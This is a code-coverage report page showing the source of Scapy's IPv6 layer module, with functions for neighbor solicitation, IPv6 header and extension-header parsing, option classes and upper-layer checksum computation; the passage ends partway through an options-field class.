Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/inet6.py: 53%

Shortcuts on this page

r m x   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1804 statements  

1# SPDX-License-Identifier: GPL-2.0-only 

2# This file is part of Scapy 

3# See https://scapy.net/ for more information 

4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp> 

5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net> 

6 

7# Cool history about this file: http://natisbad.org/scapy/index.html 

8 

9 

10""" 

11IPv6 (Internet Protocol v6). 

12""" 

13 

14 

15from hashlib import md5 

16import random 

17import socket 

18import struct 

19from time import gmtime, strftime 

20 

21from scapy.arch import get_if_hwaddr 

22from scapy.as_resolvers import AS_resolver_riswhois 

23from scapy.base_classes import Gen, _ScopedIP 

24from scapy.compat import chb, orb, raw, plain_str, bytes_encode 

25from scapy.consts import WINDOWS 

26from scapy.config import conf 

27from scapy.data import ( 

28 DLT_IPV6, 

29 DLT_RAW, 

30 DLT_RAW_ALT, 

31 ETHER_ANY, 

32 ETH_P_ALL, 

33 ETH_P_IPV6, 

34 MTU, 

35) 

36from scapy.error import log_runtime, warning 

37from scapy.fields import ( 

38 BitEnumField, 

39 BitField, 

40 ByteEnumField, 

41 ByteField, 

42 DestIP6Field, 

43 FieldLenField, 

44 FlagsField, 

45 IntField, 

46 IP6Field, 

47 LongField, 

48 MACField, 

49 MayEnd, 

50 PacketLenField, 

51 PacketListField, 

52 ShortEnumField, 

53 ShortField, 

54 SourceIP6Field, 

55 StrField, 

56 StrFixedLenField, 

57 StrLenField, 

58 X3BytesField, 

59 XBitField, 

60 XByteField, 

61 XIntField, 

62 XShortField, 

63) 

64from scapy.layers.inet import ( 

65 _ICMPExtensionField, 

66 _ICMPExtensionPadField, 

67 _ICMP_extpad_post_dissection, 

68 IP, 

69 IPTools, 

70 TCP, 

71 TCPerror, 

72 TracerouteResult, 

73 UDP, 

74 UDPerror, 

75) 

76from scapy.layers.l2 import ( 

77 CookedLinux, 

78 Ether, 

79 GRE, 

80 Loopback, 

81 SNAP, 

82 SourceMACField, 

83) 

84from scapy.packet import bind_layers, Packet, Raw 

85from scapy.sendrecv import sendp, sniff, sr, srp1 

86from scapy.supersocket import SuperSocket 

87from scapy.utils import checksum, strxor 

88from scapy.pton_ntop import inet_pton, inet_ntop 

89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ 

90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ 

91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo 

92from scapy.volatile import RandInt, RandShort 

93 

94# Typing 

95from typing import ( 

96 Optional, 

97) 

98 

# IPv6 support in the interpreter is a hard requirement for this module.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")

# Some platforms do not expose these protocol numbers; keep the value the
# socket module already provides and fall back to the well-known one.
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = getattr(socket, "IPPROTO_IPV6", 41)
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = getattr(socket, "IPPROTO_IPIP", 4)

107 

if conf.route6 is None:
    # The import is only needed for its side effect: it initializes
    # conf.route6. The imported name itself is never used.
    import scapy.route6  # noqa: F401

##########################
#  Neighbor cache stuff  #
##########################

# Cache used by getmacbyip6() to remember resolved neighbors
conf.netcache.new_cache("in6_neighbor", 120)

117 

118 

@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Send an ICMPv6 Neighbor Solicitation and wait for one answer.

    The solicitation asks for the MAC address of the neighbor owning the
    IPv6 address ``addr``. It is sent to the solicited-node multicast
    address derived from ``addr`` (both at the IPv6 and Ethernet level),
    with a hop limit of 255.

    :param addr: IPv6 address to resolve
    :param src: IPv6 address used as source of the solicitation
    :param iface: interface the frame is sent on; its hardware address is
        used as Ethernet source and as Source Link-Layer Address option
    :param timeout: how long to wait for an answer (1 second by default)
    :param chainCC: passed through to the sending function
    :return: the answer (Ethernet frame), or None if nothing was received
    """
    # Solicited-node multicast address of the target, in binary form
    solicited_node = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    ip_dst = inet_ntop(socket.AF_INET6, solicited_node)
    mac_dst = in6_getnsmac(solicited_node)
    mac_src = get_if_hwaddr(iface)

    request = (
        Ether(dst=mac_dst, src=mac_src) /
        IPv6(dst=ip_dst, src=src, hlim=255) /
        ICMPv6ND_NS(tgt=addr) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac_src)
    )
    return srp1(request, type=ETH_P_IPV6, iface=iface, timeout=timeout,
                verbose=0, chainCC=chainCC)

146 

147 

@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    # type: (str, int) -> Optional[str]
    """
    Return the MAC address of the next hop used to reach an IPv6 address.

    Resolution order:

    - multicast destinations map directly to their multicast MAC address;
    - destinations routed through the loopback interface get the
      broadcast MAC address;
    - otherwise the "in6_neighbor" cache is consulted and, on a miss, a
      Neighbor Solicitation is sent (see :func:`neighsol`). A successful
      resolution is stored in the cache.

    (chainCC parameter value ends up being passed to sending function
     used to perform the resolution, if needed)

    :return: the MAC address, or None when the neighbor did not answer

    .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
    """
    # Net6 instances are reduced to their string form
    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    # Multicast: the MAC address is derived from the address itself
    if in6_ismaddr(ip6):
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    iff, a, nh = conf.route6.route(ip6)
    if iff == conf.loopback_name:
        return "ff:ff:ff:ff:ff:ff"

    # A next hop of '::' means there is no gateway on the route: resolve
    # the destination itself, otherwise resolve the gateway.
    target = ip6 if nh == '::' else nh

    cached = conf.netcache.in6_neighbor.get(target)
    if cached:
        return cached

    res = neighsol(target, a, iff, chainCC=chainCC)
    if res is None:
        return None

    # Prefer the link-layer address option; fall back on the frame source
    if ICMPv6NDOptDstLLAddr in res:
        mac = res[ICMPv6NDOptDstLLAddr].lladdr
    else:
        mac = res.src
    conf.netcache.in6_neighbor[target] = mac
    return mac

194 

195 

196############################################################################# 

197############################################################################# 

198# IPv6 Class # 

199############################################################################# 

200############################################################################# 

201 

# Next Header value -> human readable name (used for display)
ipv6nh = {
    0: "Hop-by-Hop Option Header",
    4: "IP",
    6: "TCP",
    17: "UDP",
    41: "IPv6",
    43: "Routing Header",
    44: "Fragment Header",
    47: "GRE",
    50: "ESP Header",
    51: "AH Header",
    58: "ICMPv6",
    59: "No Next Header",
    60: "Destination Option Header",
    112: "VRRP",
    132: "SCTP",
    135: "Mobility Header",
}

# Next Header value -> name of the class used to dissect the payload
ipv6nhcls = {
    0: "IPv6ExtHdrHopByHop",
    4: "IP",
    6: "TCP",
    17: "UDP",
    43: "IPv6ExtHdrRouting",
    44: "IPv6ExtHdrFragment",
    50: "ESP",
    51: "AH",
    58: "ICMPv6Unknown",
    59: "Raw",
    60: "IPv6ExtHdrDestOpt",
}

230 

231 

class IP6ListField(StrField):
    """Field holding a list of IPv6 addresses, 16 bytes each on the wire.

    The amount of data to dissect is bounded either by ``length_from``
    (a number of bytes) or by ``count_from`` (a number of addresses);
    ``length_from`` takes precedence when both are given.
    """
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        StrField.__init__(self, name, [] if default is None else default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        """Return the size in bytes taken by the addresses of ``i``."""
        return 16 * len(i)

    def i2count(self, pkt, i):
        """Return the number of addresses in ``i`` (0 if not a list)."""
        return len(i) if isinstance(i, list) else 0

    def getfield(self, pkt, s):
        """Dissect addresses from ``s``.

        :return: a tuple (remaining bytes, list of address strings)
        """
        budget = None  # max number of addresses, None means unlimited
        byte_limit = None
        if self.length_from is not None:
            byte_limit = self.length_from(pkt)
        elif self.count_from is not None:
            budget = self.count_from(pkt)

        pending, trailer = s, b""
        if byte_limit is not None:
            pending, trailer = s[:byte_limit], s[byte_limit:]

        addresses = []
        while pending and (budget is None or budget > 0):
            if budget is not None:
                budget -= 1
            addresses.append(inet_ntop(socket.AF_INET6, pending[:16]))
            pending = pending[16:]
        return pending + trailer, addresses

    def i2m(self, pkt, x):
        """Return the concatenated binary form of the addresses in ``x``.

        An entry that inet_pton() rejects is first resolved with
        getaddrinfo() and the first result is used.
        """
        chunks = []
        for entry in x:
            try:
                packed = inet_pton(socket.AF_INET6, entry)
            except Exception:
                resolved = socket.getaddrinfo(
                    entry, None, socket.AF_INET6
                )[0][-1][0]
                packed = inet_pton(socket.AF_INET6, resolved)
            chunks.append(packed)
        return b"".join(chunks)

    def i2repr(self, pkt, x):
        """Return a printable representation of the address list."""
        if x is None:
            return "[]"
        return "[ %s ]" % (", ".join('%s' % entry for entry in x))

291 

292 

class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """Pick the class used to dissect the payload bytes ``p``.

        The decision is based on this layer's Next Header value (``nh``)
        and, for some protocols, on the first bytes of ``p``. Every byte
        access is guarded by a length check so that a truncated payload
        selects a fallback class instead of raising IndexError.

        :param p: payload bytes following this header
        :return: the class (or class name from ``ipv6nhcls``) to use;
            Raw when nothing better is known
        """
        if self.nh == 58:  # ICMPv6
            if not p:
                # No type byte to look at
                return Raw
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            # Other ICMPv6 messages: only use the dedicated class when the
            # payload is at least as long as that message's minimal header
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):
                if t == 130 and len(p) >= 28:
                    # RFC 3810 - 8.1. Query Version Distinctions
                    return ICMPv6MLQuery2
                return icmp6typescls.get(t, Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Routing type 4: Segment Routing header. Shorter payloads
            # fall through to the generic lookup below.
            return IPv6ExtHdrSegmentRouting
        return ipv6nhcls.get(self.nh, Raw)

312 

313 

class IPv6(_IPv6GuessPayload, Packet, IPTools):
    """IPv6 header.

    ``plen`` defaults to None, in which case it is computed when the
    packet is built (see post_build).
    """
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src"),
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Used to select the L2 address"""
        dst = self.dst
        scope = None
        if isinstance(dst, (Net6, _ScopedIP)):
            scope = dst.scope
        if isinstance(dst, (Gen, list)):
            # Several destinations: route according to the first one
            dst = next(iter(dst))
        return conf.route6.route(dst, dev=scope)

    def mysummary(self):
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill in ``plen`` when it was left unset.

        The length written is everything following the 40 bytes of the
        IPv6 header.
        """
        p += pay
        if self.plen is None:
            tmp_len = len(p) - 40
            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
        return p

    def extract_padding(self, data):
        """Extract the IPv6 payload

        :param data: bytes following the IPv6 header
        :return: a tuple (payload, padding)
        """

        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
            # Extract Hop-by-Hop extension length
            hbh_len = 8 + orb(data[1]) * 8

            # Extract length from the Jumbogram option
            # Note: the following algorithm take advantage of the Jumbo option
            #        mandatory alignment (4n + 2, RFC2675 Section 2)
            # Only complete options (type, length and 4 bytes of value)
            # located inside the Hop-by-Hop header are considered, so that
            # neither the upper layer data nor bytes past the end of the
            # buffer are ever looked at.
            scan_end = min(hbh_len, len(data))
            jumbo_len = None
            offset = 2
            while offset + 6 <= scan_end:
                if orb(data[offset]) == 0xc2:  # Jumbo option
                    # The length is carried in network byte order, like
                    # the IntField of the Jumbo option class
                    jumbo_len = struct.unpack(
                        "!I", data[offset + 2:offset + 6]
                    )[0]
                    break
                offset += 4

            if jumbo_len is None:
                log_runtime.info("Scapy did not find a Jumbo option")
                jumbo_len = 0

            # NOTE(review): RFC 2675 seems to define the Jumbo Payload
            # Length as already including the Hop-by-Hop header; the sum
            # is kept as-is here - confirm before changing.
            tmp_len = hbh_len + jumbo_len
        else:
            tmp_len = self.plen

        return data[:tmp_len], data[tmp_len:]

    def hashret(self):
        """Return the bytes used to pair requests with their answers."""
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                # ICMPv6 error: rely on the packet quoted in the error
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
            #       could be anything from the original list ...
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            # The last Home Address Option found, if any, gives the source
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                ss = foundhao.hoa
                nh = self.payload.nh  # XXX what if another extension follows ?

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """Tell whether this packet (the reply) answers ``other`` (the
        request)."""
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)

491 

492 

class IPv46(IP, IPv6):
    """
    Dispatcher used to detect the IP version while parsing Raw IP pcap
    files: it resolves to either IP or IPv6.
    """
    name = "IPv4/6"

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return IPv6 when the data (or the 'version' argument) says
        version 6, IP in every other case."""
        if _pkt:
            # The version is the high nibble of the first byte
            wants_v6 = orb(_pkt[0]) >> 4 == 6
        else:
            wants_v6 = kargs.get("version") == 6
        return IPv6 if wants_v6 else IP

508 

509 

def inet6_register_l3(l2, l3):
    """
    Resolve the default L2 destination address of an Ether/IPv6 packet.

    :param l2: the layer 2 packet (not used by the resolution)
    :param l3: the IPv6 packet whose ``dst`` is resolved
    :return: the result of :func:`getmacbyip6` for ``l3.dst``
    """
    destination = l3.dst
    return getmacbyip6(destination)


conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)

518 

519 

class IPerror6(IPv6):
    """IPv6 header found inside an ICMPv6 message."""
    name = "IPv6 in ICMPv6"

    def answers(self, other):
        """Tell whether this quoted packet matches ``other``, the packet
        that was initially sent.

        The match requires an ICMPv6 underlayer with a type below 128,
        equal source addresses, equal destination addresses (not checked
        when the request carries a Routing Header) and upper layers whose
        raw bytes are identical over their common length.

        TCP options, checksum and data offset are ignored when the TCP
        options differ (possible MSS clamping). They are temporarily
        nullified on both packets and always restored afterwards, even if
        building the raw bytes fails.
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        osrc = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if not (isinstance(self.underlayer, _ICMPv6) and
                self.underlayer.type < 128):
            return False

        # find upper layer for self (possible citation)
        selfup = self.payload
        while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
            selfup = selfup.payload

        # find upper layer for other (initial packet). Also look for RH
        otherup = other.payload
        request_has_rh = False
        while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
            if isinstance(otherup, IPv6ExtHdrRouting):
                request_has_rh = True
            otherup = otherup.payload

        # Basic case: same source and destination.
        # Request has a RH: don't check dst address.
        if ss != osrc or not (sd == od or request_has_rh):
            return False

        def same_leading_bytes():
            # Compare both upper layers over their common length
            s1 = raw(selfup)
            s2 = raw(otherup)
            tmp_len = min(len(s1), len(s2))
            return s1[:tmp_len] == s2[:tmp_len]

        # Let's deal with possible MSS Clamping
        seems_clamped = (isinstance(selfup, TCP) and
                         isinstance(otherup, TCP) and
                         selfup.options != otherup.options)
        if not seems_clamped:
            return same_leading_bytes()

        # Save fields modified by MSS clamping
        layers = (otherup, selfup)
        saved = [(layer.options, layer.chksum, layer.dataofs)
                 for layer in layers]
        try:
            # Nullify them
            for layer in layers:
                layer.options = []
                layer.chksum = 0
                layer.dataofs = 0
            return same_leading_bytes()
        finally:
            # recall saved values
            for layer, (opts, cksum, dataofs) in zip(layers, saved):
                layer.options = opts
                layer.chksum = cksum
                layer.dataofs = dataofs

    def mysummary(self):
        return Packet.mysummary(self)

597 

598 

599############################################################################# 

600############################################################################# 

601# Upper Layer Checksum computation # 

602############################################################################# 

603############################################################################# 

604 

class PseudoIPv6(Packet):
    """IPv6 Pseudo-header for checksum computation"""
    name = "Pseudo IPv6 Header"
    fields_desc = [
        IP6Field("src", "::"),
        IP6Field("dst", "::"),
        IntField("uplen", None),
        BitField("zero", 0, 24),
        ByteField("nh", 0),
    ]

612 

613 

def in6_pseudoheader(nh, u, plen):
    # type: (int, IP, int) -> PseudoIPv6
    """
    Build a PseudoIPv6 instance as specified in RFC 2460 8.1

    The underlayers of ``u`` are walked down to the first IPv6 instance
    and the pseudo header is filled with:

    - the Next Header value ``nh``
    - the _final_ destination: the last address of a Routing Header, or
      the first address of a Segment Routing Header, when that header has
      a non-zero segleft and a non-empty address list (the first such
      header met during the walk wins); the IPv6 destination otherwise
    - the _real_ source: the home address of a Destination Option header
      holding a single HAO option if one is met, the IPv6 source otherwise
    - the upper layer length ``plen``

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param plen: the length of the upper layer and payload
    :return: the pseudo header, or None (after a warning) when there is
        no IPv6 underlayer
    """
    # 0 is used as the "not found" marker for both addresses
    final_dst = 0
    home_addr = 0
    dst_locked = False

    layer = u
    while layer is not None and not isinstance(layer, IPv6):
        if (isinstance(layer, IPv6ExtHdrRouting) and
                layer.segleft != 0 and len(layer.addresses) != 0 and
                not dst_locked):
            final_dst = layer.addresses[-1]
            dst_locked = True
        elif (isinstance(layer, IPv6ExtHdrSegmentRouting) and
                layer.segleft != 0 and len(layer.addresses) != 0 and
                not dst_locked):
            final_dst = layer.addresses[0]
            dst_locked = True
        elif (isinstance(layer, IPv6ExtHdrDestOpt) and
                (len(layer.options) == 1) and
                isinstance(layer.options[0], HAO)):
            home_addr = layer.options[0].hoa
        layer = layer.underlayer

    if layer is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return None

    pseudo = PseudoIPv6()
    pseudo.nh = nh
    pseudo.src = home_addr if home_addr else layer.src
    pseudo.dst = final_dst if final_dst else layer.dst
    pseudo.uplen = plen
    return pseudo

669 

670 

def in6_chksum(nh, u, p):
    """
    Compute an upper-layer checksum as specified in RFC 2460 - 8.1

    The checksum covers the pseudo header built by `.in6_pseudoheader`
    followed by ``p``.

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param p: the payload of the upper layer provided as a string
    :return: the checksum, or 0 when no pseudo header could be built
    """
    pseudo = in6_pseudoheader(nh, u, len(p))
    return 0 if pseudo is None else checksum(raw(pseudo) + p)

688 

689 

690############################################################################# 

691############################################################################# 

692# Extension Headers # 

693############################################################################# 

694############################################################################# 

695 

696 

class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    """Base class inherited by all extension header classes."""
    name = 'Abstract IPv6 Option Header'
    aliastypes = [IPv6, IPerror6]  # TODO ...

701 

702 

703# IPv6 options for Extension Headers # 

704 

705_hbhopts = {0x00: "Pad1", 

706 0x01: "PadN", 

707 0x04: "Tunnel Encapsulation Limit", 

708 0x05: "Router Alert", 

709 0x06: "Quick-Start", 

710 0xc2: "Jumbo Payload", 

711 0xc9: "Home Address Option"} 

712 

713 

class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField that also displays what the option type value
    encodes: the action requested from nodes that do not understand the
    option (two high-order bits) and whether the option data may change
    en-route (third bit).

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    # Keyed by the value of the two high-order bits (mask 0xC0)
    pol = {0x00: "00: skip",
           0x40: "01: discard",
           0x80: "10: discard+ICMP",
           0xC0: "11: discard+ICMP not mcast"}

    # Keyed by the value of the third bit (mask 0x20)
    enroutechange = {0x00: "0: Don't change en-route",
                     0x20: "1: May change en-route"}

    def i2repr(self, pkt, x):
        """Return '<name> [<policy>, <en-route flag>]' for the type ``x``.

        Types without a known name are shown through their repr().
        """
        label = self.i2s.get(x, repr(x))
        policy = self.pol[x & 0xC0]
        mutability = self.enroutechange[x & 0x20]
        return "%s [%s, %s]" % (label, policy, mutability)

735 

736 

class HBHOptUnknown(Packet):  # IPv6 Hop-By-Hop Option
    """Generic type/length/data option.

    It is the class used when dissecting a list of options: its dispatch
    hook hands over to the dedicated class registered in ``_hbhoptcls``
    for the option type, if any.
    """
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):  # By default, no alignment requirement
        """
        As specified in section 4.2 of RFC 2460, every options has
        an alignment requirement usually expressed xn+y, meaning
        the Option Type must appear at an integer multiple of x octets
        from the start of the header, plus y octets.

        That function is provided the current position from the
        start of the header and returns required padding length.
        """
        return 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        """Select the option class from the first byte (option type)."""
        if not _pkt:
            return cls
        return _hbhoptcls.get(orb(_pkt[0]), cls)

    def extract_padding(self, p):
        # Whatever follows the option belongs to the next one
        return b"", p

766 

767 

class Pad1(Packet):  # IPv6 Hop-By-Hop Option
    """Padding option made of the option type byte only."""
    name = "Pad1"
    fields_desc = [
        _OTypeField("otype", 0x00, _hbhopts),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed before this option: none, as it has
        no alignment requirement."""
        return 0

    def extract_padding(self, p):
        # Whatever follows the option belongs to the next one
        return b"", p

777 

778 

class PadN(Packet):  # IPv6 Hop-By-Hop Option
    """Padding option: type, length and ``optlen`` bytes of data."""
    name = "PadN"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed before this option: none, as it has
        no alignment requirement."""
        return 0

    def extract_padding(self, p):
        # Whatever follows the option belongs to the next one
        return b"", p

791 

792 

class RouterAlert(Packet):  # RFC 2711 - IPv6 Hop-By-Hop Option
    """Router Alert option (RFC 2711)."""
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField("value", None,
                       {0: "Datagram contains a MLD message",
                        1: "Datagram contains RSVP message",
                        2: "Datagram contains an Active Network message",  # noqa: E501
                        68: "NSIS NATFW NSLP",
                        69: "MPLS OAM",
                        65535: "Reserved"}),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):
        """Return the padding needed so that the option starts at a
        position of the form 2n+0."""
        return (0 - curpos) % 2

    def extract_padding(self, p):
        # Whatever follows the option belongs to the next one
        return b"", p

817 

818 

class RplOption(Packet):  # RFC 6553 - RPL Option
    """RPL option (RFC 6553)."""
    name = "RPL Option"
    fields_desc = [
        _OTypeField("otype", 0x63, _hbhopts),
        ByteField("optlen", 4),
        # One byte of flags: three 1-bit flags and 5 unused bits
        BitField("Down", 0, 1),
        BitField("RankError", 0, 1),
        BitField("ForwardError", 0, 1),
        BitField("unused", 0, 5),
        XByteField("RplInstanceId", 0),
        XShortField("SenderRank", 0),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed so that the option starts at a
        position of the form 2n+0."""
        return (0 - curpos) % 2

    def extract_padding(self, p):
        # Whatever follows the option belongs to the next one
        return b"", p

838 

839 

class Jumbo(Packet):  # IPv6 Hop-By-Hop Option
    """Jumbo Payload option: a 32-bit payload length."""
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed so that the option starts at a
        position of the form 4n+2."""
        return (2 - curpos) % 4

    def extract_padding(self, p):
        # Whatever follows the option belongs to the next one
        return b"", p

854 

855 

class HAO(Packet):  # IPv6 Destination Options Header Option
    """Home Address Option: carries one IPv6 address (``hoa``)."""
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed so that the option starts at a
        position of the form 8n+6."""
        return (6 - curpos) % 8

    def extract_padding(self, p):
        # Whatever follows the option belongs to the next one
        return b"", p

870 

871 

# Option type -> class dissecting it (see HBHOptUnknown.dispatch_hook)
_hbhoptcls = {
    0x00: Pad1,
    0x01: PadN,
    0x05: RouterAlert,
    0x63: RplOption,
    0xC2: Jumbo,
    0xC9: HAO,
}

878 

879 

880# Hop-by-Hop Extension Header # 

881 

class _OptionsField(PacketListField):
    """List of options that can insert alignment and trailing padding.

    ``curpos`` is the position, counted from the start of the enclosing
    header, at which the first option is located.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, *args, **kargs):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, *args, **kargs)

    def i2len(self, pkt, i):
        """Return the length of the options once built (padding
        included)."""
        return len(self.i2m(pkt, i))

    def i2m(self, pkt, x):
